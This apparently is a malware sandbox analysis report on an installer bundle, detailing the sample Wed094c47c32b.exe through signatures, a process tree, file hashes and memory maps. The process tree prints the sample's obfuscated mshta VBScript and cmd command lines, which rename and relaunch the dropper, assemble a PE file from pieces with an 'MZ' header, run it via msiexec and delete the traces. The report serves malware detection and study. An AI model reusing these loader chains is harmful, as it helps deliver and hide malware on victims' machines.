Overview
overview
10Static
static
10setup_inst...32.exe
windows7_x64
10setup_inst...32.exe
windows10_x64
10setup_inst...2b.exe
windows7_x64
8setup_inst...2b.exe
windows10_x64
8setup_inst...61.exe
windows7_x64
10setup_inst...61.exe
windows10_x64
10setup_inst...f8.exe
windows7_x64
10setup_inst...f8.exe
windows10_x64
10setup_inst...34.exe
windows7_x64
10setup_inst...34.exe
windows10_x64
10setup_inst...c2.exe
windows7_x64
3setup_inst...c2.exe
windows10_x64
10setup_inst...cb.exe
windows7_x64
10setup_inst...cb.exe
windows10_x64
10setup_inst...90.exe
windows7_x64
10setup_inst...90.exe
windows10_x64
10setup_inst...79.exe
windows7_x64
6setup_inst...79.exe
windows10_x64
6setup_inst...d8.exe
windows7_x64
7setup_inst...d8.exe
windows10_x64
3setup_inst...3b.exe
windows7_x64
8setup_inst...3b.exe
windows10_x64
8setup_inst...ac.exe
windows7_x64
10setup_inst...ac.exe
windows10_x64
10setup_inst...38.exe
windows7_x64
10setup_inst...38.exe
windows10_x64
10setup_inst...b5.exe
windows7_x64
10setup_inst...b5.exe
windows10_x64
10setup_inst...b2.exe
windows7_x64
7setup_inst...b2.exe
windows10_x64
7setup_inst...rl.dll
windows7_x64
3setup_inst...rl.dll
windows10_x64
3Analysis
-
max time kernel
119s -
max time network
119s -
submitted
01-01-1970 00:00
Behavioral task
behavioral1
Sample
setup_installer/Wed0901eb1dae126e32.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
setup_installer/Wed0901eb1dae126e32.exe
Resource
win10-en-20210920
Behavioral task
behavioral3
Sample
setup_installer/Wed094c47c32b.exe
Resource
win7-en-20211014
Behavioral task
behavioral4
Sample
setup_installer/Wed094c47c32b.exe
Resource
win10-en-20210920
Behavioral task
behavioral5
Sample
setup_installer/Wed096a1bff61.exe
Resource
win7-en-20211014
Behavioral task
behavioral6
Sample
setup_installer/Wed096a1bff61.exe
Resource
win10-en-20210920
Behavioral task
behavioral7
Sample
setup_installer/Wed0971f17486f8.exe
Resource
win7-en-20210920
Behavioral task
behavioral8
Sample
setup_installer/Wed0971f17486f8.exe
Resource
win10-en-20211014
Behavioral task
behavioral9
Sample
setup_installer/Wed09977fdc12334.exe
Resource
win7-en-20210920
Behavioral task
behavioral10
Sample
setup_installer/Wed09977fdc12334.exe
Resource
win10-en-20211014
Behavioral task
behavioral11
Sample
setup_installer/Wed09abf83d9c2.exe
Resource
win7-en-20210920
Behavioral task
behavioral12
Sample
setup_installer/Wed09abf83d9c2.exe
Resource
win10-en-20210920
Behavioral task
behavioral13
Sample
setup_installer/Wed09b2a8bc4f16cb.exe
Resource
win7-en-20211014
Behavioral task
behavioral14
Sample
setup_installer/Wed09b2a8bc4f16cb.exe
Resource
win10-en-20210920
Behavioral task
behavioral15
Sample
setup_installer/Wed09b3a5ca1a712d390.exe
Resource
win7-en-20211014
Behavioral task
behavioral16
Sample
setup_installer/Wed09b3a5ca1a712d390.exe
Resource
win10-en-20210920
Behavioral task
behavioral17
Sample
setup_installer/Wed09c42cad92c20f79.exe
Resource
win7-en-20211014
Behavioral task
behavioral18
Sample
setup_installer/Wed09c42cad92c20f79.exe
Resource
win10-en-20210920
Behavioral task
behavioral19
Sample
setup_installer/Wed09cfb2f9758281d8.exe
Resource
win7-en-20211014
Behavioral task
behavioral20
Sample
setup_installer/Wed09cfb2f9758281d8.exe
Resource
win10-en-20210920
Behavioral task
behavioral21
Sample
setup_installer/Wed09d27135e5a8b3b.exe
Resource
win7-en-20210920
Behavioral task
behavioral22
Sample
setup_installer/Wed09d27135e5a8b3b.exe
Resource
win10-en-20211014
Behavioral task
behavioral23
Sample
setup_installer/Wed09d8d6edfaff2ac.exe
Resource
win7-en-20210920
Behavioral task
behavioral24
Sample
setup_installer/Wed09d8d6edfaff2ac.exe
Resource
win10-en-20211014
Behavioral task
behavioral25
Sample
setup_installer/Wed09db0d52c38.exe
Resource
win7-en-20210920
Behavioral task
behavioral26
Sample
setup_installer/Wed09db0d52c38.exe
Resource
win10-en-20210920
Behavioral task
behavioral27
Sample
setup_installer/Wed09e95ff6b5.exe
Resource
win7-en-20211014
Behavioral task
behavioral28
Sample
setup_installer/Wed09e95ff6b5.exe
Resource
win10-en-20210920
Behavioral task
behavioral29
Sample
setup_installer/Wed09f257bb7877d00b2.exe
Resource
win7-en-20211014
Behavioral task
behavioral30
Sample
setup_installer/Wed09f257bb7877d00b2.exe
Resource
win10-en-20210920
Behavioral task
behavioral31
Sample
setup_installer/libcurl.dll
Resource
win7-en-20211014
Behavioral task
behavioral32
Sample
setup_installer/libcurl.dll
Resource
win10-en-20210920
General
-
Target
setup_installer/Wed094c47c32b.exe
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
XYB0bVL96aEKhA.exEpid process 1896 XYB0bVL96aEKhA.exE -
Loads dropped DLL 2 IoCs
Processes:
cmd.exemsiexec.exepid process 316 cmd.exe 1068 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 1764 taskkill.exe -
Processes:
mshta.exemshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
taskkill.exedescription pid process Token: SeDebugPrivilege 1764 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Wed094c47c32b.exemshta.execmd.exeXYB0bVL96aEKhA.exEmshta.exemshta.execmd.exedescription pid process target process PID 560 wrote to memory of 764 560 Wed094c47c32b.exe mshta.exe PID 560 wrote to memory of 764 560 Wed094c47c32b.exe mshta.exe PID 560 wrote to memory of 764 560 Wed094c47c32b.exe mshta.exe PID 560 wrote to memory of 764 560 Wed094c47c32b.exe mshta.exe PID 560 wrote to memory of 764 560 Wed094c47c32b.exe mshta.exe PID 560 wrote to memory of 764 560 Wed094c47c32b.exe mshta.exe PID 560 wrote to memory of 764 560 Wed094c47c32b.exe mshta.exe PID 764 wrote to memory of 316 764 mshta.exe cmd.exe PID 764 wrote to memory of 316 764 mshta.exe cmd.exe PID 764 wrote to memory of 316 764 mshta.exe cmd.exe PID 764 wrote to memory of 316 764 mshta.exe cmd.exe PID 764 wrote to memory of 316 764 mshta.exe cmd.exe PID 764 wrote to memory of 316 764 mshta.exe cmd.exe PID 764 wrote to memory of 316 764 mshta.exe cmd.exe PID 316 wrote to memory of 1896 316 cmd.exe XYB0bVL96aEKhA.exE PID 316 wrote to memory of 1896 316 cmd.exe XYB0bVL96aEKhA.exE PID 316 wrote to memory of 1896 316 cmd.exe XYB0bVL96aEKhA.exE PID 316 wrote to memory of 1896 316 cmd.exe XYB0bVL96aEKhA.exE PID 316 wrote to memory of 1896 316 cmd.exe XYB0bVL96aEKhA.exE PID 316 wrote to memory of 1896 316 cmd.exe XYB0bVL96aEKhA.exE PID 316 wrote to memory of 1896 316 cmd.exe XYB0bVL96aEKhA.exE PID 316 wrote to memory of 1764 316 cmd.exe taskkill.exe PID 316 wrote to memory of 1764 316 cmd.exe taskkill.exe PID 316 wrote to memory of 1764 316 cmd.exe taskkill.exe PID 316 wrote to memory of 1764 316 cmd.exe taskkill.exe PID 316 wrote to memory of 1764 316 cmd.exe taskkill.exe PID 316 wrote to memory of 1764 316 cmd.exe taskkill.exe PID 316 wrote to memory of 1764 316 cmd.exe taskkill.exe PID 1896 wrote to memory of 1816 1896 XYB0bVL96aEKhA.exE mshta.exe PID 1896 wrote to memory of 1816 1896 XYB0bVL96aEKhA.exE mshta.exe PID 1896 wrote to memory of 1816 1896 XYB0bVL96aEKhA.exE mshta.exe PID 1896 wrote to memory of 1816 1896 XYB0bVL96aEKhA.exE mshta.exe PID 1896 wrote to memory of 1816 1896 XYB0bVL96aEKhA.exE mshta.exe PID 1896 wrote to memory of 1816 1896 XYB0bVL96aEKhA.exE mshta.exe PID 1896 wrote to memory of 1816 1896 XYB0bVL96aEKhA.exE mshta.exe PID 1816 wrote to memory of 1520 1816 mshta.exe cmd.exe PID 1816 wrote to memory of 1520 1816 mshta.exe cmd.exe PID 1816 wrote to memory of 1520 1816 mshta.exe cmd.exe PID 1816 wrote to memory of 1520 1816 mshta.exe cmd.exe PID 1816 wrote to memory of 1520 1816 mshta.exe cmd.exe PID 1816 wrote to memory of 1520 1816 mshta.exe cmd.exe PID 1816 wrote to memory of 1520 1816 mshta.exe cmd.exe PID 1896 wrote to memory of 2028 1896 XYB0bVL96aEKhA.exE mshta.exe PID 1896 wrote to memory of 2028 1896 XYB0bVL96aEKhA.exE mshta.exe PID 1896 wrote to memory of 2028 1896 XYB0bVL96aEKhA.exE mshta.exe PID 1896 wrote to memory of 2028 1896 XYB0bVL96aEKhA.exE mshta.exe PID 1896 wrote to memory of 2028 1896 XYB0bVL96aEKhA.exE mshta.exe PID 1896 wrote to memory of 2028 1896 XYB0bVL96aEKhA.exE mshta.exe PID 1896 wrote to memory of 2028 1896 XYB0bVL96aEKhA.exE mshta.exe PID 2028 wrote to memory of 1332 2028 mshta.exe cmd.exe PID 2028 wrote to memory of 1332 2028 mshta.exe cmd.exe PID 2028 wrote to memory of 1332 2028 mshta.exe cmd.exe PID 2028 wrote to memory of 1332 2028 mshta.exe cmd.exe PID 2028 wrote to memory of 1332 2028 mshta.exe cmd.exe PID 2028 wrote to memory of 1332 2028 mshta.exe cmd.exe PID 2028 wrote to memory of 1332 2028 mshta.exe cmd.exe PID 1332 wrote to memory of 1892 1332 cmd.exe cmd.exe PID 1332 wrote to memory of 1892 1332 cmd.exe cmd.exe PID 1332 wrote to memory of 1892 1332 cmd.exe cmd.exe PID 1332 wrote to memory of 1892 1332 cmd.exe cmd.exe PID 1332 wrote to memory of 1892 1332 cmd.exe cmd.exe PID 1332 wrote to memory of 1892 1332 cmd.exe cmd.exe PID 1332 wrote to memory of 1892 1332 cmd.exe cmd.exe PID 1332 wrote to memory of 1316 1332 cmd.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScript: cLOSE( CREatEObJEcT ( "WSCRIpt.ShELL"). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF """"=="""" for %L IN (""C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe))2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF ""=="" for %L IN ("C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe") do taskkill -f -im "%~nxL"3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exEXYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScript: cLOSE( CREatEObJEcT ( "WSCRIpt.ShELL"). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF ""/Pgxf5hQhM5tF ""=="""" for %L IN (""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe))5⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF "/Pgxf5hQhM5tF "=="" for %L IN ("C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE") do taskkill -f -im "%~nxL"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCriPt:closE ( CrEaTeoBJecT ("WsCRiPT.ShEll" ). RuN( "cmd /R EcHO | SEt /p = ""MZ"" > OsuKT1.9t & cOPY /B /y OsuKT1.9t+XRB2l6FD.IlF +9Odf.6 PEQqN6S.Ou & STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t ", 0 , True ))5⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R EcHO | SEt /p = "MZ" > OsuKT1.9t & cOPY /B /y OsuKT1.9t+XRB2l6FD.IlF+9Odf.6 PEQqN6S.Ou &STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>OsuKT1.9t"7⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\PEQQN6S.OU7⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im "Wed094c47c32b.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\9Odf.6MD5
b259839b9455f04e8299f22cebe3274f
SHA130bbbc8d5089648c8c5425c23874976ba2e07b34
SHA256edf7907b29f08e5788b6c611660348cce7cfaacb16bc484471aa06a1b9f8af89
SHA5123de7e0e2d59a9bda837ca9bc5f0da15106ed045aaf28b0ad9ff6afb2a901f23747ace1373d9538692847f51cfbb22fa608e526cacce737c7e70b7482a643bb0d
-
C:\Users\Admin\AppData\Local\Temp\OsuKT1.9tMD5
ac6ad5d9b99757c3a878f2d275ace198
SHA1439baa1b33514fb81632aaf44d16a9378c5664fc
SHA2569b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b
-
C:\Users\Admin\AppData\Local\Temp\PEQQN6S.OUMD5
a2feb31d070b6920981b5461baa1ef81
SHA18b67bdb5e4a9e773c0ffade6545a3f292b2e7fd7
SHA256ac7f2aaad9b9548136d48eb1e769d4339e958fb56fda2151f8637add5a77c950
SHA512b82a3d898d1f328353c1911eff024f5b523f1d4fdf4dbdc914b2775d16590cce9c027e34b9c3f9681e9e09436dc345b4cff878b953c8525891736aeea1e14694
-
C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exEMD5
b5cfd3a9dc9e645e24c79991bca60460
SHA10d6bcdca2121d279bbe87c66cab515ac2478f555
SHA256852bffb94dbd3ed18ac11311b701ee80400209a19b3660b544146b41fa3b9768
SHA51255861773c758e5f3cc7440d012d820892f7b9155b542baeab940a8c80fd50ffd1001fca6f9f9dae7eca3ae53919eba795aca53d5bb3aaaf29a111acd016d24e6
-
C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exEMD5
b5cfd3a9dc9e645e24c79991bca60460
SHA10d6bcdca2121d279bbe87c66cab515ac2478f555
SHA256852bffb94dbd3ed18ac11311b701ee80400209a19b3660b544146b41fa3b9768
SHA51255861773c758e5f3cc7440d012d820892f7b9155b542baeab940a8c80fd50ffd1001fca6f9f9dae7eca3ae53919eba795aca53d5bb3aaaf29a111acd016d24e6
-
C:\Users\Admin\AppData\Local\Temp\xrB2l6FD.ilFMD5
cd4352def1a81b4fe232eeb2c77dbc57
SHA19fb4f9a790efe3676915699bdc89ba0a06ce8210
SHA25693589b9795d7547015734043f51c8d9a561857452eb91a52609a0be35bc3701c
SHA5121b59d106cc324ad4c6f99358f6d9a6ec9c671ec8573c1f3084bf3d7f3c8f410691c9324b986d51cd89d5b0c48be95298a13a012ecbcfa379af906db25066656e
-
\Users\Admin\AppData\Local\Temp\PEQqN6S.OuMD5
a2feb31d070b6920981b5461baa1ef81
SHA18b67bdb5e4a9e773c0ffade6545a3f292b2e7fd7
SHA256ac7f2aaad9b9548136d48eb1e769d4339e958fb56fda2151f8637add5a77c950
SHA512b82a3d898d1f328353c1911eff024f5b523f1d4fdf4dbdc914b2775d16590cce9c027e34b9c3f9681e9e09436dc345b4cff878b953c8525891736aeea1e14694
-
\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exEMD5
b5cfd3a9dc9e645e24c79991bca60460
SHA10d6bcdca2121d279bbe87c66cab515ac2478f555
SHA256852bffb94dbd3ed18ac11311b701ee80400209a19b3660b544146b41fa3b9768
SHA51255861773c758e5f3cc7440d012d820892f7b9155b542baeab940a8c80fd50ffd1001fca6f9f9dae7eca3ae53919eba795aca53d5bb3aaaf29a111acd016d24e6
-
memory/316-58-0x0000000000000000-mapping.dmp
-
memory/560-55-0x00000000754F1000-0x00000000754F3000-memory.dmpFilesize
8KB
-
memory/764-56-0x0000000000000000-mapping.dmp
-
memory/1068-86-0x0000000000AC0000-0x0000000000C58000-memory.dmpFilesize
1.6MB
-
memory/1068-88-0x0000000000C60000-0x0000000000D15000-memory.dmpFilesize
724KB
-
memory/1068-87-0x0000000002640000-0x000000000276B000-memory.dmpFilesize
1.2MB
-
memory/1068-82-0x0000000000000000-mapping.dmp
-
memory/1068-89-0x0000000002770000-0x000000000281F000-memory.dmpFilesize
700KB
-
memory/1068-90-0x0000000002820000-0x00000000028BA000-memory.dmpFilesize
616KB
-
memory/1316-76-0x0000000000000000-mapping.dmp
-
memory/1332-73-0x0000000000000000-mapping.dmp
-
memory/1520-68-0x0000000000000000-mapping.dmp
-
memory/1764-64-0x0000000000000000-mapping.dmp
-
memory/1816-66-0x0000000000000000-mapping.dmp
-
memory/1892-75-0x0000000000000000-mapping.dmp
-
memory/1896-61-0x0000000000000000-mapping.dmp
-
memory/2028-71-0x0000000000000000-mapping.dmp